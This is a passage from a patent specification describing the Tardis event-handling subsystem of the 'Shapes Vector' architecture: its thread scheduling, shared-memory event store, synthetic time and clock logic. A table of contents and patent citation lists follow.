US8291332Dec 23, 2008Oct 16, 2012Apple Inc.Layer for accessing user interface elements
US8300055Mar 21, 2011Oct 30, 2012Apple Inc.User interface for controlling three-dimensional animation of an object
US8332454 *Oct 17, 2011Dec 11, 2012Resource Consortium LimitedCreating a projection of a situational network
US8341287Oct 9, 2009Dec 25, 2012Citrix Systems, Inc.Systems and methods for configuring policy bank invocations
US8358609Oct 17, 2011Jan 22, 2013Resource Consortium LimitedLocation based services in a situational network
US8370386Nov 3, 2009Feb 5, 2013The Boeing CompanyMethods and systems for template driven data mining task editing
US8386565Dec 29, 2008Feb 26, 2013International Business Machines CorporationCommunication integration between users in a virtual universe
US8401992Feb 5, 2010Mar 19, 2013IT Actual, Sdn. Bhd.Computing platform based on a hierarchy of nested data structures
US8533840 *Mar 25, 2003Sep 10, 2013DigitalDoors, Inc.Method and system of quantifying risk
US8542238Mar 23, 2010Sep 24, 2013Apple Inc.User interface for controlling animation of an object
US8542599Aug 29, 2012Sep 24, 2013Resource Consortium LimitedLocation based services in a situational network
US8554346Nov 16, 2010Oct 8, 2013Shawdon, LpMethod of displaying product and service performance data
US8631147Mar 12, 2007Jan 14, 2014Citrix Systems, Inc.Systems and methods for configuring policy bank invocations
US8635363Jun 25, 2010Jan 21, 2014Citrix Systems, Inc.System, method and computer program product to maximize server throughput while avoiding server overload by controlling the rate of establishing server-side network connections
US8694292Dec 19, 2008Apr 8, 2014Disney Enterprises, Inc.Method and system for estimating building performance
US8730863Sep 9, 2008May 20, 2014The Charles Stark Draper Laboratory, Inc.Network communication systems and methods
US8769013Oct 17, 2011Jul 1, 2014Resource Consortium LimitedNotifications using a situational network
US8799502Oct 31, 2006Aug 5, 2014Citrix Systems, Inc.Systems and methods for controlling the number of connections established with a server
US8826139Oct 26, 2007Sep 2, 2014Resource Consortium LimitedSearchable message board
US8862532Feb 28, 2012Oct 14, 2014Honeywell International Inc.Displaying information associated with an operation state of a building
US8989696Oct 5, 2011Mar 24, 2015Resource Consortium LimitedAccess of information using a situational network
US9104294Apr 12, 2006Aug 11, 2015Apple Inc.Linked widgets
US20040172217 *Jan 15, 2004Sep 2, 2004Fischer John G.Method of displaying product and service performance data
US20040193870 *Mar 25, 2003Sep 30, 2004Digital Doors, Inc.Method and system of quantifying risk
US20040254951 *Jun 16, 2003Dec 16, 2004Anthony BloeschAsset composition
US20050182844 *Feb 9, 2005Aug 18, 2005Sun Microsystems, Inc.Efficient communication in a client-server scene graph system
US20050231512 *Apr 16, 2004Oct 20, 2005Niles Gregory EAnimation of an object using behaviors
US20050248565 *May 10, 2004Nov 10, 2005PixarTechniques for processing complex scenes
US20050248573 *May 10, 2004Nov 10, 2005PixarStoring intra-model dependency information
US20060005114 *Jun 2, 2005Jan 5, 2006Richard WilliamsonProcedurally expressing graphic objects for web pages
US20060005207 *Jun 3, 2005Jan 5, 2006Louch John OWidget authoring and editing environment
US20060010394 *Jun 23, 2005Jan 12, 2006Chaudhri Imran AUnified interest layer for user interface
US20120259885 *Apr 9, 2012Oct 11, 2012Siemens CorporationMeta-data approach to querying multiple biomedical ontologies
US20140071135 *Mar 29, 2013Mar 13, 2014Magnet Systems Inc.Managing activities over time in an activity graph
US20140245443 *Nov 16, 2013Aug 28, 2014Sayan ChakrabortyCyber Defense Systems And Methods
USRE45132Oct 11, 2012Sep 9, 2014Pea Tree Foundation L.L.C.System and method for control and training of avatars in an interactive environment
Classifications
U.S. Classification345/473
International ClassificationG06F3/14, H04L12/24, G06T11/20, G06T15/00, G06F17/50
Cooperative ClassificationG06F11/328, G06T2200/24, H04L41/046, H04L41/0686, G06F17/5045, G06F11/3495, G06F2201/86, H04L41/22, G06T11/206
European ClassificationH04L41/22, H04L41/06F, G06T11/20T, G06F17/50D, G06F11/32S6, G06F11/34T12, G06F11/34M
Legal Events
DateCodeEventDescription
Mar 21, 2003ASAssignment
Owner name: COMMONWEALTH OF AUSTRALIA, THE, AUSTRALIA
Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNORS:ANDERSON, MARK STEPHEN;ENGELHARDT, DEAN CRAWFORD;MARRIOTT, DAMIAN ANDREW;AND OTHERS;REEL/FRAME:014286/0234
Effective date: 20021125
Sep 15, 2009FPAYFee payment
Year of fee payment: 4
Nov 22, 2013REMIMaintenance fee reminder mailed
Apr 11, 2014LAPSLapse for failure to pay maintenance fees
Jun 3, 2014FPExpired due to failure to pay maintenance fee
Effective date: 20140411
|
__label__pos
| 0.827878 |
MathOverflow is a question and answer site for professional mathematicians. It's 100% free, no registration required.
Sign up
Here's how it works:
1. Anybody can ask a question
2. Anybody can answer
3. The best answers are voted up and rise to the top
Arising as the traces of $H(div; \Omega)$, I am wondering if the space $H^{-1/2}(\partial \Omega)$ has any regularity properties? (Containment in BV would be wonderful, although I doubt it holds.) It seems difficult to find anything in the literature.
share|cite|improve this question
up vote 3 down vote accepted
Of course not. For instance, it contains $L^2(\partial\Omega)$. By definition, $H^{-1/2}(\partial\Omega)$ is the dual of $H^{1/2}(\partial\Omega)$. If $\Omega$ is $n$-dimensional $n\ge3$, then $\partial\Omega$ is $(n-1)$-dimensional and $H^{1/2}(\partial\Omega)\subset L^p(\partial\Omega)$ by Sobolev injection, for every $p\le\frac{2(n-1)}{n-3}$ ($<+\infty$ if $n=3$) and therefore $H^{-1/2}(\partial\Omega)$ contains $L^{p'}$. But you cannot say much more. If $s>\frac n2$, then $H^s(\Omega)\subset C^0(\overline\Omega)$ and therefore $H^{\frac12-s}(\partial\Omega)$ is contained in the set of bounded measures. But this does not apply to $H^{-\frac12}$, even if $n=2$ (thanks to A. Rekalo). Actually, a use of the Uniform Boundedness Principle tells us that there exists an element of $H^{-\frac12}(\partial\Omega)$ that is not a bounded measure.
share|cite|improve this answer
@Andrey. I acknowledge my mistake about continuity (I'll edit). But I maintain that $H^{-1/2}$ contains $L^2$, just because $L^2\subset H^{1/2}$. – Denis Serre Dec 3 '12 at 11:41
@Denis Serre: Sorry, my reading skills are horrible today. I misread your statement (as if you wrote that $H^{-1/2}$ is contained in $L^2$). Stupid me. – Andrey Rekalo Dec 3 '12 at 12:26
no problem. This happens to me too. And I know that it is easier to see two mistakes when there is at least one for sure. – Denis Serre Dec 3 '12 at 14:32
Ok, a further question: What if we have $div \phi \equiv 1$ on $\Omega$? (Or up to a set of measure $\epsilon$.) Can we then get extra regularity for the normal trace?
share|cite|improve this answer
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.823315 |
summaryrefslogtreecommitdiffhomepage
path: root/digital/mimot/src/dirty/counter_ext.avr.c
blob: bd004c25b0fc46089191dce5fc9f1d401dc1c01a (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
/* counter_ext.avr.c - External counter support. */
/* asserv - Position & speed motor control on AVR. {{{
*
* Copyright (C) 2008 Nicolas Schodet
*
* APBTeam:
* Web: http://apbteam.org/
* Email: team AT apbteam DOT org
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* }}} */
#include "common.h"
#include "counter.h"
#include "modules/utils/utils.h"
#include "modules/math/fixed/fixed.h"
#include "io.h"
/**
* This file add support for an external counter like the hdlcounter or
* avrcounter project. This can be better in order not to loose steps and
* support more counters.
*/
/** Define the first auxiliary counter address. */
#define COUNTER_AUX0 0
/** Define the second auxiliary counter address. */
#define COUNTER_AUX1 1
/** Define to 1 to reverse the first auxiliary counter. */
#define COUNTER_AUX0_REVERSE 0
/** Define to 1 to reverse the second auxiliary counter. */
#define COUNTER_AUX1_REVERSE 0
/** First auxiliary counter shift. */
#define COUNTER_AUX0_SHIFT 1
/** Second auxiliary counter shift. */
#define COUNTER_AUX1_SHIFT 1
/** Define to 1 to use the AVR External Memory system, or 0 to use hand made
* signals. */
#define COUNTER_USE_XMEM 0
/** Last values. */
static uint16_t counter_aux_old[AC_ASSERV_AUX_NB];
/** New values, being updated by step update. */
static int16_t counter_aux_new_step[AC_ASSERV_AUX_NB];
/** Last raw step values */
static uint8_t counter_aux_old_step[AC_ASSERV_AUX_NB];
/** Overall counter values. */
uint16_t counter_aux[AC_ASSERV_AUX_NB];
/** Counter differences since last update.
* Maximum of 9 significant bits, sign included. */
int16_t counter_aux_diff[AC_ASSERV_AUX_NB];
#if !COUNTER_USE_XMEM
# define COUNTER_ALE_IO B, 4
# define COUNTER_RD_IO D, 6
#endif
/** Read an external counter. */
static inline uint8_t
counter_read (uint8_t n)
{
#if COUNTER_USE_XMEM
uint8_t * const ext = (void *) 0x1100;
return ext[n];
#else
uint8_t v;
PORTA = (PORTA & 0xf0) | (n & 0x0f);
IO_CLR (COUNTER_ALE_IO);
PORTA &= 0xf0;
DDRA &= 0xf0;
DDRB &= 0xf0;
IO_CLR (COUNTER_RD_IO);
utils_nop ();
utils_nop ();
v = (PINA & 0x0f) | (PINB & 0x0f) << 4;
IO_SET (COUNTER_RD_IO);
IO_SET (COUNTER_ALE_IO);
DDRA |= 0x0f;
DDRB |= 0x0f;
return v;
#endif
}
/** Initialize the counters. */
void
counter_init (void)
{
#if COUNTER_USE_XMEM
/* Long wait-states. */
XMCRA = _BV (SRW11);
/* Do not use port C for address. */
XMCRB = _BV (XMM2) | _BV (XMM1) | _BV (XMM0);
/* Long wait-states and enable. */
MCUCR |= _BV (SRE) | _BV (SRW10);
#else
IO_SET (COUNTER_ALE_IO);
IO_SET (COUNTER_RD_IO);
IO_OUTPUT (COUNTER_ALE_IO);
IO_OUTPUT (COUNTER_RD_IO);
PORTA &= 0xf0;
PORTB &= 0xf0;
DDRA |= 0x0f;
DDRB |= 0x0f;
#endif
/* Begin with safe values. */
counter_aux_old_step[0] = counter_read (COUNTER_AUX0);
counter_aux_old_step[1] = counter_read (COUNTER_AUX1);
}
/** Update one step. If counters are not read fast enough, they could
* overflow, call this function often to update step counters. */
void
counter_update_step (void)
{
uint8_t aux0, aux1;
int8_t diff;
/* Sample counters. */
aux0 = counter_read (COUNTER_AUX0);
aux1 = counter_read (COUNTER_AUX1);
/* Update step counters. */
diff = (int8_t) (aux0 - counter_aux_old_step[0]);
counter_aux_old_step[0] = aux0;
counter_aux_new_step[0] += diff;
diff = (int8_t) (aux1 - counter_aux_old_step[1]);
counter_aux_old_step[1] = aux1;
counter_aux_new_step[1] += diff;
}
/** Update overall counter values and compute diffs. */
void
counter_update (void)
{
/* Wants fresh data. */
counter_update_step ();
/* First auxiliary counter. */
uint16_t aux0 = counter_aux_new_step[0];
aux0 &= 0xffff << COUNTER_AUX0_SHIFT; /* Reset unused bits. */
#if !COUNTER_AUX0_REVERSE
counter_aux_diff[0] = (int16_t) (aux0 - counter_aux_old[0]);
#else
counter_aux_diff[0] = (int16_t) (counter_aux_old[0] - aux0);
#endif
counter_aux_diff[0] >>= COUNTER_AUX0_SHIFT;
counter_aux_old[0] = aux0;
counter_aux[0] += counter_aux_diff[0];
/* Second auxiliary counter. */
uint16_t aux1 = counter_aux_new_step[1];
aux1 &= 0xffff << COUNTER_AUX1_SHIFT; /* Reset unused bits. */
#if !COUNTER_AUX1_REVERSE
counter_aux_diff[1] = (int16_t) (aux1 - counter_aux_old[1]);
#else
counter_aux_diff[1] = (int16_t) (counter_aux_old[1] - aux1);
#endif
counter_aux_diff[1] >>= COUNTER_AUX1_SHIFT;
counter_aux_old[1] = aux1;
counter_aux[1] += counter_aux_diff[1];
}
|
__label__pos
| 0.600249 |
Cite This Page
To Go
Computing Derivatives
Computing Derivatives
Computing Derivatives: What's in a Slope? True or False
1. Let f(x) = e. Then -> f'(x) = 0
2. What is the derivative of f(x) = 5x + 6?
-> f'(x) = 5
3. Which of the following is not a power function? ->
4. For which function f(x) is f'(x) = -3x-4{ ?} -> f(x) = x-3
5. What is the derivative of f(x) = ex?
-> f'(x) = ex(ln x)
6. The slope of the function f(x) = ex is
-> always either 0 or positive.
7. Let f(x) = 6x. Then
-> f'(x) = 6x(ln6)
8. Which function f(x) has the derivative f'(x) = x-1?
-> f(x) = x-2
9. Let f(x) = cos(x). Then
-> f'(x) = cos(x)
10. Which function's derivative is f'(x) = sin(x)?
-> f(x) = -cos(x)
Submit
|
__label__pos
| 1 |
Ticket #1985: patch.txt
File patch.txt, 3.3 KB (added by dbenbenn, 8 years ago)
Line
1
2New patches:
3
4[Fix bug 1985
5David Benbennick <[email protected]>**20071224012920] {
6hunk ./Data/IntSet.hs 547
7--- | /O(min(n,W))/. Retrieves the maximal key of the set, and the set stripped from that element
8+-- | /O(min(n,W))/. Retrieves the maximal key of the set, and the set stripped of that element.
9hunk ./Data/IntSet.hs 550
10-maxView t
11- = case t of
12- Bin p m l r | m < 0 -> let (result,t') = maxViewUnsigned l in return (result, bin p m t' r)
13- Bin p m l r -> let (result,t') = maxViewUnsigned r in return (result, bin p m l t')
14- Tip y -> return (y,Nil)
15- Nil -> fail "maxView: empty set has no maximal element"
16+maxView Nil = fail "maxView: empty set has no maximal element"
17+maxView t = return $ deleteFindMax t
18hunk ./Data/IntSet.hs 559
19--- | /O(min(n,W))/. Retrieves the minimal key of the set, and the set stripped from that element
20+-- | /O(min(n,W))/. Retrieves the minimal key of the set, and the set stripped of that element.
21hunk ./Data/IntSet.hs 562
22-minView t
23- = case t of
24- Bin p m l r | m < 0 -> let (result,t') = minViewUnsigned r in return (result, bin p m l t')
25- Bin p m l r -> let (result,t') = minViewUnsigned l in return (result, bin p m t' r)
26- Tip y -> return (y, Nil)
27- Nil -> fail "minView: empty set has no minimal element"
28+minView Nil = fail "minView: empty set has no minimal element"
29+minView t = return $ deleteFindMin t
30hunk ./Data/IntSet.hs 572
31--- Duplicate the Identity monad here because base < mtl.
32-newtype Identity a = Identity { runIdentity :: a }
33-instance Monad Identity where
34- return a = Identity a
35- m >>= k = k (runIdentity m)
36-
37-
38hunk ./Data/IntSet.hs 576
39-deleteFindMin = runIdentity . minView
40+deleteFindMin Nil = (error "deleteFindMin: cannot return the minimal element of an empty set", Nil)
41+deleteFindMin (Tip y) = (y, Nil)
42+deleteFindMin (Bin p m l r)
43+ | m < 0 = let (result, t') = minViewUnsigned r in (result, bin p m l t')
44+ | otherwise = let (result, t') = minViewUnsigned l in (result, bin p m t' r)
45hunk ./Data/IntSet.hs 586
46-deleteFindMax = runIdentity . maxView
47+deleteFindMax Nil = (error "deleteFindMax: cannot return the maximal element of an empty set", Nil)
48+deleteFindMax (Tip y) = (y, Nil)
49+deleteFindMax (Bin p m l r)
50+ | m < 0 = let (result, t') = maxViewUnsigned l in (result, bin p m t' r)
51+ | otherwise = let (result, t') = maxViewUnsigned r in (result, bin p m l t')
52hunk ./Data/IntSet.hs 594
53-findMin = fst . runIdentity . minView
54+findMin = fst . deleteFindMin
55hunk ./Data/IntSet.hs 598
56-findMax = fst . runIdentity . maxView
57+findMax = fst . deleteFindMax
58hunk ./Data/IntSet.hs 602
59-deleteMin = snd . runIdentity . minView
60+deleteMin = snd . deleteFindMin
61hunk ./Data/IntSet.hs 606
62-deleteMax = snd . runIdentity . maxView
63+deleteMax = snd . deleteFindMax
64}
65
66Context:
67
68[Fix a link in haddock docs
69Ian Lynagh <[email protected]>**20071126184450]
70[Fix some URLs
71Ian Lynagh <[email protected]>**20071126214233]
72[Add tiny regression test
73David Benbennick <[email protected]>**20071113045358]
74[Fix ticket 1762
75David Benbennick <[email protected]>**20071111201939]
76[Specify build-type: Simple
77Duncan Coutts <[email protected]>**20071018125404]
78[Add a boring file
79Ian Lynagh <[email protected]>**20070913204647]
80[TAG 2007-09-13
81Ian Lynagh <[email protected]>**20070913215901]
82Patch bundle hash:
83ad8baf94a3c4817286c5a499d8b8e658ad874cd8
|
__label__pos
| 0.741126 |
Free Tools
Compression Analysis Tool
A FREE TOOL FOR VISUALIZING THE PERFORMANCE OF STREAMING COMPRESSION USING YOUR DATA
To download, please first verify that you are not a robot
Requires .NET Framework 4.5
Q&A Methodology Core code Screenshots Ask a question
The Compression Analysis Tool is a free benchmarking tool for the .NET Framework that lets you analyze the performance characteristics of LZF4, DEFLATE, ZLIB, GZIP, BZIP2 and LZMA and helps you discover which is the best compression method for your requirements.
You provide the data to be benchmarked and CAT produces measurements and charts with which you can compare how different compression methods and compression levels affect the compression and decompression speed and the compression ratio of your data.
Your data, your benchmarks, your choice!
Q&A
What type of questions can CAT answer?
• Which method compresses my data faster?
• Which method decompresses my data faster?
• Which method reduces the size of my data more?
• How does the compression level affect compression speed?
• How does the compression level affect decompression speed?
• How does the compression level affect compression ratio?
• Which method and level compress faster at a specific ratio?
• Which method and level decompress faster at a specific ratio?
Which comparison charts are available in CAT?
• Compression speed
• Decompression speed
• Both compression and decompression speeds
• Compressed size
• Compression speed vs compressed size, with Pareto frontier
• Decompression speed vs compressed size, with Pareto frontier
Which implementations does CAT support?
• DotNetCompression: LZF4
• DotNetCompression: DEFLATE
• DotNetCompression: ZLIB
• DotNetCompression: GZIP
• DotNetCompression: BZIP2
• DotNetCompression: LZMA
• .NET Framework: DEFLATE
• .NET Framework: GZIP
• SharpZipLib: DEFLATE
• SharpZipLib: ZLIB
• SharpZipLib: GZIP
• DotNetZip: DEFLATE
• DotNetZip: ZLIB
• DotNetZip: GZIP
What values does CAT display?
• Original size in bytes
• Compressed size in bytes
• Compressed size as percentage of original size
• Time taken to compress in milliseconds
• Time taken to decompress in milliseconds
• Compression speed in kilobytes per second
• Decompresison speed in kilobytes per second
• Intregrity check pass or fail
• Compression memory for LZF4/DEFLATE/ZLIB/GZIP
• Decompression memory for LZF4/DEFLATE/ZLIB/GZIP
• Window bits for DEFLATE/ZLIB/GZIP
• Memory level for DEFLATE/ZLIB/GZIP
Methodology
The Compression Analysis Tool is specially designed to accurately measure the throughput capabilities of lossless data compression implementations that conform to the streaming API of the .NET Framework.
CAT is based on the typical compression or decompression operation which involves reading the input data from a source stream, compressing or decompressing the input data to produce the output data, and writing the output data to a target stream.
To make this operation suitable for benchmarking we must ensure that:
Excluding the read/write overhead
When measuring the total time that the compression or decompression operation takes from beginning to end, this total time includes not only the time taken to compress or decompress the data but also the time taken to read and write the data.
In order to calculate the compressor's or decompressor's throughput without confusing it with the throughput of the read/write operations, the time taken to read and write the data must be excluded from the total time. To exclude the reading time we measure the time taken to read the input data and then deduct it from the total time. To exclude the writing time we write the output data to the null stream which consumes almost no resources.
The resulting time represents the time required by the compressor or decompressor to process the data without the overhead introduced by data read/write operations.
Measuring the full throughput
The performance of the process that is running the compression or decompression operation is affected by the execution of foreground or background processes, context switching, memory fragmentation, garbage collection, underclocking and other factors.
As a result, the measured performance is not stable but can fluctuate considerably when performing multiple passes over the same data using the same compression method. The throughput of some passes might be close to the full throughput of the compressor or decompressor for that particular data while the throughput of other passes might be significantly less than its real potential.
To minimize the effects of these factors, in each compression or decompression stage we perform multiple passes and calculate the throughput of each pass separately. At the end we select the highest throughput as being the one that is the closest to the full throughput that the implementation is capable of delivering.
Determining the number of passes
The number of passes performed in each stage is determined dynamically and depends on the time taken to compress or decompress the data being processed during that stage.
The reason for abandoning a stage that takes less than 10 ms is that its duration is insufficient for obtaining reliable measurements; the shorter the duration, the more volatile the performance becomes to the effects of external factors. We also abandon any stage that has a throughput of less than 10 KB/s as being unrealistically slow.
Core code
CAT's operation consists of four stages:
Stage 1 is always performed. Stages 2, 3 and 4 are optional and independent of each other.
Stage 1: Compress the test file and write the output to a temporary file
This is a single-pass stage during which uncompressed data is read from the input stream, compressed and written to the output stream. It returns the length of the uncompressed input stream and the length of the compressed output stream.
If only the compression ratio is required, this is the only stage that needs to be performed. If Stage 2 or 3 is performed, this stage also serves as a warm-up run.
// *********************************************************
// Compress a stream and write the output to another stream.
// *********************************************************
private void CompressToFile(
CompressionFactory compression,
int compressionLevel,
Stream uncompressedInputStream,
Stream compressedOutputStream,
ref byte[] inputBuffer,
int inputBufferSize,
out long uncompressedLength,
out long compressedLength)
{
// The source and target streams are being reused. Position their cursors at the
// beginning.
uncompressedInputStream.Position = 0;
compressedOutputStream.Position = 0;
// Create the stream that will compress the data.
compressedOutputStream = compression.CreateOutputStream(compressedOutputStream, compressionLevel, true);
// Read from the source stream as many bytes as the input buffer can hold.
// Process them and write the output to the target stream.
int bytesRead;
while ((bytesRead = uncompressedInputStream.Read(inputBuffer, 0, inputBufferSize)) > 0)
{
compressedOutputStream.Write(inputBuffer, 0, bytesRead);
}
// Close the target stream so that data remaining in the inputBuffer are written out.
compressedOutputStream.Close();
// Assign the size of the data before and after compression.
uncompressedLength = uncompressedInputStream.Length;
compressedLength = compressedOutputStream.Length;
}
Stage 2: Compress the test file and write the output to the null stream
This is a multi-pass stage during which uncompressed data is read from the input stream, compressed and written to the null stream. It returns the time taken to compress the data after subtracting from it the time taken to read the data.
This stage is performed only if the compression throughput is required. If this stage is performed, the number of passes to be made will be determined dynamically depending on the time taken to compress the particular data being processed during this stage.
// ***********************************************
// Compress a stream and write the output to null.
// ***********************************************
private void CompressToNull(
CompressionFactory compression,
int compressionLevel,
Stream uncompressedInputStream,
ref byte[] inputBuffer,
int inputBufferSize,
out decimal processingTime)
{
// The source stream is being reused. Position its cursor at the beginning.
uncompressedInputStream.Position = 0;
// To ensure that our measurements do not include the time spent reading data from
// the source, we read from the source using our ByteCounterStream that enables us to
// measure the reading time so that at the end we can deduct it from the total time.
var byteCounter = new ByteCounterStream(uncompressedInputStream, null);
uncompressedInputStream = byteCounter;
// Reset the byteCounter in order to zero the ReadTime accumulated up to now.
// We must start accumulating ReadTime only after the stopwatch is started.
// Otherwise our calculations will be wrong and result in negative processing times
// for very small files.
byteCounter.Reset();
// To ensure that our measurements do not include the time spent writing data to the
// target, we assign the target to a null stream which does not consume any resources.
Stream compressedOutputStream = Stream.Null;
// Create a stopwatch and start it.
Stopwatch processingStopwatch = new Stopwatch();
processingStopwatch.Start();
// Create the stream that will compress the data.
compressedOutputStream = compression.CreateOutputStream(compressedOutputStream, compressionLevel, false);
// Read from the source stream as many bytes as the input buffer can hold.
// Process them and write the output to the target stream.
int bytesRead;
while ((bytesRead = uncompressedInputStream.Read(inputBuffer, 0, inputBufferSize)) > 0)
{
compressedOutputStream.Write(inputBuffer, 0, bytesRead);
}
// Close the target stream so that data remaining in the inputBuffer are written out.
compressedOutputStream.Close();
// Stop the stopwatch.
// Calculate the processing time by substracting the read time from the elapsed time.
processingStopwatch.Stop();
processingTime = (decimal)(processingStopwatch.Elapsed.TotalMilliseconds - byteCounter.ReadTime.TotalMilliseconds);
}
Stage 3: Decompress the temporary file and write the output to the null stream
This is a multi-pass stage during which compressed data is read from the input stream, decompressed and written to the null stream. It returns the time taken to decompress the data after subtracting from it the time taken to read the data.
This stage is performed only if the decompression throughput is required. If this stage is performed, the number of passes to be made will be determined dynamically depending on the time taken to decompress the particular data being processed during this stage.
// *************************************************
// Decompress a stream and write the output to null.
// *************************************************
private void DecompressToNull(
CompressionFactory compression,
Stream compressedInputStream,
ref byte[] inputBuffer,
int inputBufferSize,
out decimal processingTime)
{
// The source stream is being reused. Position its cursor at the beginning.
compressedInputStream.Position = 0;
// To ensure that our measurements do not include the time spent reading data from
// the source, we read from the source using our ByteCounterStream that enables us to
// measure the reading time so that at the end we can deduct it from the total time.
var byteCounter = new ByteCounterStream(compressedInputStream, null);
compressedInputStream = byteCounter;
// Reset the byteCounter in order to zero the ReadTime accumulated up to now.
// We must start accumulating ReadTime only after the stopwatch is started.
// Otherwise our calculations will be wrong and result in negative processing times
// for very small files.
byteCounter.Reset();
// To ensure that our measurements do not include the time spent writing data to the
// target, we assign the target to a null stream which does not consume any resources.
Stream decompressedInputStream = Stream.Null;
// Create a stopwatch and start it.
Stopwatch processingStopwatch = new Stopwatch();
processingStopwatch.Start();
// Create the stream that will decompress the data.
compressedInputStream = compression.CreateInputStream(compressedInputStream, true);
// Read from the source stream as many bytes as the input buffer can hold.
// Process them and write the output to the target stream.
int bytesRead;
while ((bytesRead = compressedInputStream.Read(inputBuffer, 0, inputBufferSize)) > 0)
{
decompressedInputStream.Write(inputBuffer, 0, bytesRead);
}
// Close the target stream so that data remaining in the inputBuffer are written out.
decompressedInputStream.Close();
// Stop the stopwatch.
// Calculate the processing time by substracting the read time from the elapsed time.
processingStopwatch.Stop();
processingTime = (decimal)(processingStopwatch.Elapsed.TotalMilliseconds - byteCounter.ReadTime.TotalMilliseconds);
}
Stage 4: Decompress the temporary file and check its integrity
This is a single-pass stage during which uncompressed data is read from one input stream, compressed data is read from another input stream and decompressed, and the two of them are compared to confirm that they are identical.
This stage is performed only if integrity checking is required.
// **********************************************************************************************
// Decompress a compressed stream and compare its contents with those of the uncompressed stream.
// **********************************************************************************************
private void DecompressAndCheckIntegrity(
CompressionFactory compression,
Stream uncompressedInputStream,
Stream compressedInputStream,
ref byte[] compressedInputBuffer,
int compressedInputBufferSize,
out bool success)
{
// The two source streams are being reused. Position their cursors at the beginning.
uncompressedInputStream.Position = 0;
compressedInputStream.Position = 0;
// Create the stream that will decompress the data.
compressedInputStream = compression.CreateInputStream(compressedInputStream, true);
// Decompress the compressed data and confirm it is the same as the uncompressed data.
int decompressedBytesRead = 0;
int uncompressedBytesRead = 0;
byte[] uncompressedInputBuffer = new byte[compressedInputBuffer.Length];
success = true;
while ((decompressedBytesRead = compressedInputStream.Read(compressedInputBuffer, 0, compressedInputBufferSize)) > 0)
{
do
{
uncompressedBytesRead = uncompressedInputStream.Read(uncompressedInputBuffer, 0, decompressedBytesRead);
for (int i = 0; i < uncompressedBytesRead; i++)
{
success = success && (uncompressedInputBuffer[i] == compressedInputBuffer[i]);
}
decompressedBytesRead -= uncompressedBytesRead;
} while (success && (decompressedBytesRead > 0));
};
// There are no more compressed bytes left to read. Check that there are also no more
// uncompressed bytes left to read.
uncompressedBytesRead = uncompressedInputStream.Read(uncompressedInputBuffer, 0, compressedInputBufferSize);
success = success && (uncompressedBytesRead == 0);
}
Screenshots
Compression speed of different compression methods and levels
Thumbnail of chart comparing the compression speed of different compression methods and levels
Decompression speed of different compression methods and levels
Thumbnail of chart comparing the decompression speed of different compression methods and levels
Compressed size of different compression methods and levels
Thumbnail of chart comparing the compressed size of different compression methods and levels
Compression and decompression speed of different compression methods and levels
Thumbnail of chart comparing the compression and decompression speed of different compression methods and levels
Compression speed vs compressed size of different compression methods and levels, with Pareto frontier
Thumbnail of chart comparing the compression speed vs the compressed size of different compression methods and levels
Decompression speed vs compressed size of different compression methods and levels, with Pareto frontier
Thumbnail of chart comparing the decompression speed vs the compressed size of different compression methods and levels
|
__label__pos
| 0.981596 |
Manual Chapter : Using Topology Load Balancing to Distribute DNS Requests to Specific Resources
Applies To:
Show Versions Show Versions
BIG-IP DNS
• 14.0.0
Manual Chapter
Using Topology Load Balancing to Distribute DNS Requests to Specific Resources
How do I configure BIG-IP DNS to load balance DNS requests to specific resources?
You can configure BIG-IP® DNS to load balance DNS requests to a resource based on the physical proximity of the resource to the client making the request. You can also configure BIG-IP DNS to deliver region-specific content, such as news and weather, to a client making a request from a specific location.
You can accomplish this by configuring BIG-IP DNS to perform Topology load balancing.
About Topology load balancing
Topology load balancing distributes DNS name resolution requests based on the proximity of the client to the data center housing the resource that responds to the request. When Topology load balancing is enabled, the BIG-IP® system uses topology records to make load balancing decisions.
Understanding topology records
A topology record is a set of characteristics that maps the origin of a DNS name resolution request to a destination. Each topology record contains the following elements:
• A request source statement that specifies the origin LDNS of a DNS request.
• A destination statement that specifies the pool or pool member to which the weight of the topology record will be assigned.
• A weight that the BIG-IP® system assigns to a pool or a pool member during the load balancing process.
Note: In tmsh, the weight parameter is called score.
Understanding user-defined regions
A region is a customized collection of topologies that defines a specific geographical location that has meaning for your network. For example, you can create two custom regions named Region_east and Region_west. Region_east includes the states on the east coast of the United States. Region_west includes the states on the west coast of the United States Then, you can use those custom regions as the Request Source or Destination of a topology record you create.
This table describes how the use of topology regions improves the load-balancing performance of the BIG-IP® system.
Faster load balancing configuration Slower load balancing configuration
2 data centers 2 data centers
1000 pool members in each data center 1000 pool members in each data center
2 regions with 5000 CIDR entries each
2 topology records: 10,000 topology records:
1 entry routes all requests from Region_east to data center1 5000 CIDR topology records route requests to data center1
1 entry routes all requests from Region_west to data center2 5000 CIDR topology records route requests to data center2
Creating a region for Topology load balancing
Create regions to customize the Topology load balancing capabilities of the BIG-IP system. For example, you can create two regions to represent the data centers in your network: dc1_pools and dc2_pools. Alternatively, you can create a region to which you can add IP subnets as you expand your network. Then, when you create a topology record, you can use the custom regions as the Request Source or Destination of the record.
1. On the Main tab, click DNS > GSLB > Topology > Regions .
2. Click Create.
The new record screen opens.
3. In the Name field, type a unique identifier for the region.
4. To add members to the region, do the following for each member you want to add to the region:
1. From the Member Type list, select a type of identifier.
